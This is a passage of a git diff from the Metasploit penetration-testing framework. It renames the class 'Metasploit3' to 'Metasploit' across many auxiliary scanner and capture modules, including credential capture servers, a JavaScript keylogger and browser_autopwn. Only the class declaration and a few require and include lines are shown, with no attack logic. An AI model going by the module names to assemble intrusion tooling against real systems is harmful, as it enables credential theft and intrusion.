34a0940b48..72c0bc9f7d 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/snmp_login.rb b/modules/auxiliary/scanner/snmp/snmp_login.rb index a12761684b..dbff3cb0c0 100644 --- a/modules/auxiliary/scanner/snmp/snmp_login.rb +++ b/modules/auxiliary/scanner/snmp/snmp_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/community_string_collection' require 'metasploit/framework/login_scanner/snmp' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/snmp_set.rb b/modules/auxiliary/scanner/snmp/snmp_set.rb index edd07e2785..e25cc756ad 100644 --- a/modules/auxiliary/scanner/snmp/snmp_set.rb +++ b/modules/auxiliary/scanner/snmp/snmp_set.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb index 445634756e..75bd8b7804 100644 --- a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb +++ b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb index c6cf8702bd..3171c01871 100644 --- a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb index 52becd24cc..cb42ab478d 100644 --- a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/karaf_login.rb b/modules/auxiliary/scanner/ssh/karaf_login.rb index be6c4539c9..8670f3c97c 100644 --- a/modules/auxiliary/scanner/ssh/karaf_login.rb +++ b/modules/auxiliary/scanner/ssh/karaf_login.rb @@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::CommandShell diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 3379adad44..88d85dee3e 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb index 6a066ffef3..beecb2e996 100644 --- a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb +++ b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/ssh' require 'sshkey' # TODO: Actually include this! -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index e6925f9660..c8f0f18aab 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index 2fd040823b..fd31314462 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb index 885d224e51..bffbc691fd 100644 --- a/modules/auxiliary/scanner/ssh/ssh_version.rb +++ b/modules/auxiliary/scanner/ssh/ssh_version.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'recog' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssl/openssl_ccs.rb b/modules/auxiliary/scanner/ssl/openssl_ccs.rb index 7b727ef94c..34229c7980 100644 --- a/modules/auxiliary/scanner/ssl/openssl_ccs.rb +++ b/modules/auxiliary/scanner/ssl/openssl_ccs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index 409c8722ad..24212e1c07 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -11,7 +11,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/steam/server_info.rb b/modules/auxiliary/scanner/steam/server_info.rb index 398e0fb038..202194bd8b 100644 --- a/modules/auxiliary/scanner/steam/server_info.rb +++ b/modules/auxiliary/scanner/steam/server_info.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/steam' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Rex::Proto::Steam diff --git a/modules/auxiliary/scanner/telephony/wardial.rb b/modules/auxiliary/scanner/telephony/wardial.rb index 18cd6912cc..9e1b71415b 100644 --- a/modules/auxiliary/scanner/telephony/wardial.rb +++ b/modules/auxiliary/scanner/telephony/wardial.rb @@ -34,7 +34,7 @@ class Object end end -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb index b6af840661..2334d2181e 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb index 2facedd4f1..b63138894b 100644 --- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb +++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index 63dda3f8ab..bc7b3363c2 100644 --- a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/telnet' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb index a23e6058ef..d4358964ba 100644 --- a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb +++ b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/telnet_version.rb b/modules/auxiliary/scanner/telnet/telnet_version.rb index 644a178b89..5118452a70 100644 --- a/modules/auxiliary/scanner/telnet/telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/telnet_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb index dc1e190457..1e2dd3dcab 100644 --- a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb +++ b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/tftp/netdecision_tftp.rb b/modules/auxiliary/scanner/tftp/netdecision_tftp.rb index fd8c131316..7f35056943 100644 --- a/modules/auxiliary/scanner/tftp/netdecision_tftp.rb +++ b/modules/auxiliary/scanner/tftp/netdecision_tftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/tftp/tftpbrute.rb b/modules/auxiliary/scanner/tftp/tftpbrute.rb index 29935dc352..df9b49dc67 100644 --- a/modules/auxiliary/scanner/tftp/tftpbrute.rb +++ b/modules/auxiliary/scanner/tftp/tftpbrute.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/udp_scanner_template.rb b/modules/auxiliary/scanner/udp_scanner_template.rb index 07ec5c659d..5c63de3491 100644 --- a/modules/auxiliary/scanner/udp_scanner_template.rb +++ b/modules/auxiliary/scanner/udp_scanner_template.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/upnp/ssdp_amp.rb b/modules/auxiliary/scanner/upnp/ssdp_amp.rb index 5d2217308d..b59d7e3f08 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_amp.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_amp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index 0f7496a036..1b4982ac81 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb index 0cc62c9a60..f52a2f40b7 100644 --- a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb +++ b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmauthd_login.rb b/modules/auxiliary/scanner/vmware/vmauthd_login.rb index 5844222e6c..f879d08d2a 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_login.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_login.rb @@ -7,7 +7,7 @@ require 'msf/core/exploit/tcp' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/vmauthd' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vmware/vmauthd_version.rb b/modules/auxiliary/scanner/vmware/vmauthd_version.rb index 28b6355385..a63d871998 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_version.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_version.rb @@ -5,7 +5,7 @@ require 'msf/core/exploit/tcp' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb index d8bb09b6c5..835cf8934f 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb index 3cd4b3563a..4908feaeb3 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb index 8189a9b495..0224b1e6e9 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb index 45081e5019..828ba06b66 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_host_details.rb b/modules/auxiliary/scanner/vmware/vmware_host_details.rb index cd4cfb164c..e731d22cb1 100644 --- a/modules/auxiliary/scanner/vmware/vmware_host_details.rb +++ b/modules/auxiliary/scanner/vmware/vmware_host_details.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_http_login.rb b/modules/auxiliary/scanner/vmware/vmware_http_login.rb index 0225eddd6e..660886b098 100644 --- a/modules/auxiliary/scanner/vmware/vmware_http_login.rb +++ b/modules/auxiliary/scanner/vmware/vmware_http_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb index de4f89435f..13ce903430 100644 --- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb +++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb index 68e1922d5e..bfd1bda6cd 100644 --- a/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb +++ b/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb b/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb index 600db46d77..5d206d00d2 100644 --- a/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb +++ b/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb index 91ec122893..ed28faf18f 100644 --- a/modules/auxiliary/scanner/vnc/vnc_login.rb +++ b/modules/auxiliary/scanner/vnc/vnc_login.rb @@ -8,7 +8,7 @@ require 'rex/proto/rfb' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/vnc' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb index e16a345997..eb4f411355 100644 --- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb +++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/rfb' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/voice/recorder.rb b/modules/auxiliary/scanner/voice/recorder.rb index 0f4fe85d52..677163a7b6 100644 --- a/modules/auxiliary/scanner/voice/recorder.rb +++ b/modules/auxiliary/scanner/voice/recorder.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'fileutils' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::IAX2 diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb index 88914a5525..9056346364 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb index 655bfbf00b..37d742e65c 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb index 05b76dd142..fcf58e9145 100644 --- a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb +++ b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index a4ce2652f7..c890005405 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -9,7 +9,7 @@ require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 1871aa59d1..ed5ebf893c 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -10,7 +10,7 @@ require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner' require 'metasploit/framework/login_scanner/winrm' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 7beaf89022..bdf0930115 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/x11/open_x11.rb b/modules/auxiliary/scanner/x11/open_x11.rb index 32912c464f..31f6ea1152 100644 --- a/modules/auxiliary/scanner/x11/open_x11.rb +++ b/modules/auxiliary/scanner/x11/open_x11.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/server/android_browsable_msf_launch.rb b/modules/auxiliary/server/android_browsable_msf_launch.rb index 7d603eb953..bb678ff06b 100644 --- a/modules/auxiliary/server/android_browsable_msf_launch.rb +++ b/modules/auxiliary/server/android_browsable_msf_launch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer diff --git a/modules/auxiliary/server/android_mercury_parseuri.rb b/modules/auxiliary/server/android_mercury_parseuri.rb index d152584e06..4ecbd2379f 100644 --- a/modules/auxiliary/server/android_mercury_parseuri.rb +++ b/modules/auxiliary/server/android_mercury_parseuri.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index 35a4fcc4cc..5b1292d6b5 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -12,7 +12,7 @@ require 'msf/core' require 'rex/exploitation/js/detect' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb index 1c28beee94..bfcb777af3 100644 --- a/modules/auxiliary/server/browser_autopwn2.rb +++ b/modules/auxiliary/server/browser_autopwn2.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::BrowserAutopwn2 diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb index 970b8cda7f..6e158b841d 100644 --- a/modules/auxiliary/server/capture/drda.rb +++ b/modules/auxiliary/server/capture/drda.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb index 667eca6a4a..d2242624ab 100644 --- a/modules/auxiliary/server/capture/ftp.rb +++ b/modules/auxiliary/server/capture/ftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index 721835e278..2250629e8d 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http_basic.rb b/modules/auxiliary/server/capture/http_basic.rb index 8e8db5c2ab..52fc9f4426 100644 --- a/modules/auxiliary/server/capture/http_basic.rb +++ b/modules/auxiliary/server/capture/http_basic.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http_javascript_keylogger.rb b/modules/auxiliary/server/capture/http_javascript_keylogger.rb index aefe8fce9c..6ed4fa1e11 100644 --- a/modules/auxiliary/server/capture/http_javascript_keylogger.rb +++ b/modules/auxiliary/server/capture/http_javascript_keylogger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb index 9d775d940d..70e284d106 100644 --- a/modules/auxiliary/server/capture/http_ntlm.rb +++ b/modules/auxiliary/server/capture/http_ntlm.rb @@ -13,7 +13,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/imap.rb b/modules/auxiliary/server/capture/imap.rb index 843ef0580b..7069a2ff84 100644 --- a/modules/auxiliary/server/capture/imap.rb +++ b/modules/auxiliary/server/capture/imap.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/mssql.rb b/modules/auxiliary/server/capture/mssql.rb index 99885df4af..a834a762a9 100644 --- 